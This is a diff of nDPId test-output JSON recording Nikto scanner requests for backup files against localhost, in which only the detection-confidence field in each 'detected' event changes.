00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 